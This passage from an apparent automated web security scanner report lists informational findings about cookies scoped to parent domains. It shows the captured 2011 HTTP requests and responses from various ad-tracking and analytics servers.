fc=_rPwyhtVWelLo9w8DEY9_lAHjwFtIvCqbMQSJ9jL5-FWFlt1l3kRMakuAXIQEbJ_NS-bcQhrOad4QJ1GnWK2ezeoq1NiKoT_dgJhMqoQ2e-iZpdh_q1bBpHenL6WAlOydHJF1CbuvE8l0lnSvDlQbUGQ3KO8-Xa4sNWyeZuC_Jo; pf=didDAAwXT27__r8LS9I2zEDxpSfL7IM1u56Bwn-p5lIbT6x9-XWYSjdy1isJgNTBqQxXSeAmQm9ZpwC4nbV5xMWPSU-hLNIcjpFuaPM_j1j1XJ-dEQgnYOgQTFPo1-eM9SDRceAzeZk52c4DamEdg7XFKT7txTFzsq66plXaF8wy-s2FUWUfxjDJSsUchQ9wueBMXqZax6H_I76jdSqObugcyKCm2M0l5XO-Qzx43cg6tYdo2m7e8Gc41LCSpWYs0RM0bon_RXV1dcM6lDF-Er25L7T9Plwhsq3bO8k4sEzMek-j2501dhLrTRU7UI1geo8cfzenAcgONGPxADQWUg; rrs=3%7C6%7C9%7C4%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C5%7C1001%7C1004; rds=15195%7C15195%7C15195%7C15201%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15197%7C15195%7C15195%7C15195%7C15195; rv=1; uid=3041410246858069995

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3041410246858069995; Domain=.turn.com; Expires=Sat, 11-Feb-2012 18:26:13 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:12 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3041410246858069995&rnd=4165358895193705353&fpid=1&nu=n&t=
...[SNIP]...

12.3. http://ak1.abmr.net/is/www.att.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www.att.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.att.com?U=/global/images/priceLine_bg.gif&V=3-4L8s0Rm6Q3C9AuOk1gdnIv8A2PQHwaOlZ+ok8dvw%2fyHRXeIxaMGF7g%3d%3d&I=00E0DB608ED9193&D=www.att.com&01AD=1& HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: ak1.abmr.net

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.att.com/global/images/priceLine_bg.gif?01AD=3y_FhavpLpy0Az7sa5s6EJ9FWcy5KENbn9flUOSJPda06wv7fmLyN_A&01RI=00E0DB608ED9193&01NA=
Expires: Mon, 15 Aug 2011 18:19:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:20 GMT
Connection: close
Set-Cookie: 01AI=2-2-066CB173E87CE55F4A7D8859E3AF1B0C744E837B34AF7545AF28FE3877F0B64C-CB58ADF9AF091C2673E5D034B67A2C7B22A03B632F8D982C20B7A8EBA016C3DC; expires=Tue, 14-Aug-2012 18:19:20 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


12.4. http://ak1.abmr.net/is/www.wireless.att.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www.wireless.att.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.wireless.att.com?U=/cell-phone-service/images/cart/en/assist_btn.gif&V=3-vko07ILw2X5GtumyuJBCSq9+YoFG+Rcn%2f92JwFgUEu4Oy7XTW5aa+hrmm5nqZoOY&I=BDE9DFECD72EBA9&D=www.wireless.att.com&01AD=1& HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Cookie: 01AI=2-2-EE34781477D09535AD10FF387FAAC647F572C92C23BB2D281248A426FB62A53C-4BCF4F156599E84DD0BD0C1E4CD6DA0DEB619F5B7B49B0CF680C44FCAD428460
Host: ak1.abmr.net

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.wireless.att.com/cell-phone-service/images/cart/en/assist_btn.gif?01AD=3yRGJWB5wDwjSCxjAiWkDg3saGZHj23T0uqcL5pHKEpNKTwsCmCB6Aw&01RI=BDE9DFECD72EBA9&01NA=
Expires: Mon, 15 Aug 2011 18:19:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:25 GMT
Connection: close
Set-Cookie: 01AI=2-2-8F6A296E59A0DC0173107E351BC754196A50B7453B506E30FCDC3A4C6F1ED425-376E9706C426CA4C4A57EF5C0F4A2583A17E3630446C70C6BFFAE04962ED14B7; expires=Tue, 14-Aug-2012 18:19:25 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


12.5. http://akamai.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://akamai.mathtag.com
Path:   /sync/img

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync/img?mt_exid=10001&mt_exuid=A3106A1EF9078DAF348E74F1ECE0A7D9&rurl=4-XRXEfsHUjX79wpr90WUBHEpPFgFZ7K8LqRetMfIhMPc9HdQnCfLMr1PUFryk8nm6SGOR7Ob3F8bi38OgGeVIjYtli7qcgnMsfT+MDqksz5VSZPlHpmzEqOFjqv75w90mVwh6lHmr6mVQ49yZctOABIVbSoBQHAVVe8rvkPpfTyXBC88XF4vO1Q%3d%3d&V=3-GE6Oh0szcH0kdxBPAshRP%2frLcgS+eCOCZ8%2fTha0kfdlxBGza5HIZghKje7Yu%2fQgd HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: akamai.mathtag.com

Response

HTTP/1.1 302 Moved Temporarily
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6806 26630
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 43
Expires: Mon, 15 Aug 2011 18:20:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:42 GMT
Connection: close
Set-Cookie: uuid=4e49637a-3b74-e247-fea7-4b3e66b6d71b; domain=.mathtag.com; path=/; expires=Tue, 14-Aug-2012 18:20:42 GMT
Set-Cookie: ts=1313432442; domain=.mathtag.com; path=/; expires=Tue, 14-Aug-2012 18:20:42 GMT
Set-Cookie: mt_mop=10001:1313432442; domain=.mathtag.com; path=/; expires=Tue, 14-Aug-2012 18:20:42 GMT
Location: http://www.wireless.att.com/store_maintenance/images/page_midSlice.gif?01RI=1946BF68A41E07A&01CM=cm:akamai.mathtag.com&01NA=ck&

GIF89a.............!.......,...........D..;

12.6. http://api.bizographics.com/v1/profile.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.json?&callback=cnnad_bizo_load_ad_callback&api_key=vuy5aqx2hg8yv997yw9e5jr4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KX2vDEYkjj68aj5XcunNcMDa7Re6IGD4lLWOSE2iimqa3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtR5QpvePKBw6ArykBishtoVkEVUJBxdqAyD3lFIcLMteW4iiqSbERYipuWHxYXQtZCS6EipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Mon, 15 Aug 2011 18:45:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KWmlUlSisdmOxaj5XcunNcMDa7Re6IGD4lDIPfXzsFKUaAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQiizxJ8nJqAy5KisYO67RyvfEVUJBxdqAyCVVGcnipFb1ARYpCNxiiJkJBmAxhisg5kK3YipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 176
Connection: keep-alive

cnnad_bizo_load_ad_callback({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

12.7. http://ar.voicefive.com/b/recruitBeacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/recruitBeacon.pli?pid=p107223597&PRAd=6003&AR_C=603 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/?l=1142910522&sz=300x250&wr=h&t=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:36:31 2011&recExp=Mon Aug 8 01:36:31 2011&prad=314453502&arc=210323181&; ar_p45555483=exp=1&initExp=Sun Aug 14 22:53:19 2011&recExp=Sun Aug 14 22:53:19 2011&prad=65427569&arc=36060045&; UID=1dc84e78-80.67.74.137-1312767393

Response

HTTP/1.1 302 Redirect
Server: nginx
Date: Mon, 15 Aug 2011 18:26:36 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: BMX_BR=pid=p107223597&prad=6003&arc=603&exp=1313432796; expires=Tue 16-Aug-2011 18:26:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: ar_p107223597=exp=2&initExp=Mon Aug 15 18:25:22 2011&recExp=Mon Aug 15 18:26:36 2011&prad=6003&arc=603&; expires=Sun 13-Nov-2011 18:26:36 GMT; path=/; domain=.voicefive.com;
Location: http://b.voicefive.com/p?c1=4&c2=p107223597&c3=6003&c4=603&c5=&c6=2&c7=Mon%20Aug%2015%2018%3A25%3A22%202011&c8=&c9=&c10=&c15=&rn=1313432796
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent
Content-Length: 0


12.8. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6034961&rn=0.26338764396496117&c7=http%3A%2F%2Fwww.imdb.com%2F&c3=&c4=http%253A%252F%252Fwww.imdb.com%252F&c5=&c6=&c10=&c15=&c16=&c8=The%20Internet%20Movie%20Database%20(IMDb)&c9=&cv=1.7 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=33d3453a-80.67.74.137-1310656935

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 15 Aug 2011 18:24:02 GMT
Connection: close
Set-Cookie: UID=33d3453a-80.67.74.137-1310656935; expires=Wed, 14-Aug-2013 18:24:02 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


12.9. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/?l=1142910522&sz=300x250&wr=h&t=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=33d3453a-80.67.74.137-1310656935

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 15 Aug 2011 18:26:37 GMT
Connection: close
Set-Cookie: UID=33d3453a-80.67.74.137-1310656935; expires=Wed, 14-Aug-2013 18:26:37 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

12.10. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035748&d.c=gif&d.o=cnn-adbp-domestic&d.x=110892361&d.t=page&d.u=http%3A%2F%2Fwww.cnn.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=33d3453a-80.67.74.137-1310656935

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 15 Aug 2011 18:45:09 GMT
Connection: close
Set-Cookie: UID=33d3453a-80.67.74.137-1310656935; expires=Wed, 14-Aug-2013 18:45:09 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

12.11. http://b.voicefive.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=4&c2=p107223597&c3=6003&c4=603&c5=&c6=1&c7=Mon%20Aug%2015%2018%3A25%3A22%202011&c8=&c9=&c10=&c15=&rn=1313432722 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/?l=1142910522&sz=300x250&wr=h&t=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:36:31 2011&recExp=Mon Aug 8 01:36:31 2011&prad=314453502&arc=210323181&; ar_p45555483=exp=1&initExp=Sun Aug 14 22:53:19 2011&recExp=Sun Aug 14 22:53:19 2011&prad=65427569&arc=36060045&; UID=1dc84e78-80.67.74.137-1312767393; BMX_BR=pid=p107223597&prad=6003&arc=603&exp=1313432722; ar_p107223597=exp=1&initExp=Mon Aug 15 18:25:22 2011&recExp=Mon Aug 15 18:25:22 2011&prad=6003&arc=603&

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 15 Aug 2011 18:26:36 GMT
Connection: close
Set-Cookie: UID=1dc84e78-80.67.74.137-1312767393; expires=Wed, 14-Aug-2013 18:26:36 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

12.12. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://banners.adultfriendfinder.com
Path:   /go/page/iframe_cm_26358

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/page/iframe_cm_26358?dcb=sexfinder.com&pid=p1935206.submad_70975_1_s5232&madirect=http://medleyads.com/spot/c/1313434697/1376046894/10664.html HTTP/1.1
Host: banners.adultfriendfinder.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:52 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,IPDnYK9LPElKtOp23iKt5ZzHGR0dtCKllPHqgsvcj13fvkskx4bbQm6F66eDPa410PU86fLd7lbFcIw26rWp9pjKfhvAZsbS2AIta07UzdIhBLLebh/pcIK3wr/3oE8b39ayFOf7NFF/h_LYDH4RXZke/zyv/4Sk5cy5VpAJ9mHO3/Utt0cMZnVylsjqLZD3; path=/; domain=.adultfriendfinder.com
Set-Cookie: v_hash=_english_13029; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: ffadult_tr=r,Gf4cx0MBS68uu5LLsiToqHGKORZFXs5PWa_XSBvVwwhoujBG4d6PjPbjfuqQG_Kk; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki26-18.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 13347
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...

12.13. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fm.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/c1/jsc/fm.js?c=234&a=0&f=&n=187&r=13&d=94&q=&$=&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6b-8952-4aa4e37ca04c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=157
Expires: Mon, 15 Aug 2011 18:58:17 GMT
Date: Mon, 15 Aug 2011 18:55:40 GMT
Content-Length: 895
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCust
...[SNIP]...

12.14. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fmr.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/c1/jsc/fmr.js?c=234&a=0&f=&n=187&r=13&d=94&q=&$=&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6e-8747-4aa4e3834d480"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=124
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:40 GMT
Content-Length: 895
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCust
...[SNIP]...

12.15. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzA0NzA4OQ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/du/id/L21rdC80L21waWQvMzA0NzA4OQ

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/du/id/L21rdC80L21waWQvMzA0NzA4OQ HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=64&exchange_id=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2865308626608336017

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2865308626608336017; Domain=.p-td.com; Expires=Sat, 11-Feb-2012 18:25:05 GMT; Path=/
Location: http://segment-pixel.invitemedia.com/set_partner_uid?partnerID=191&sscs_active=1&partnerUID=2865308626608336017
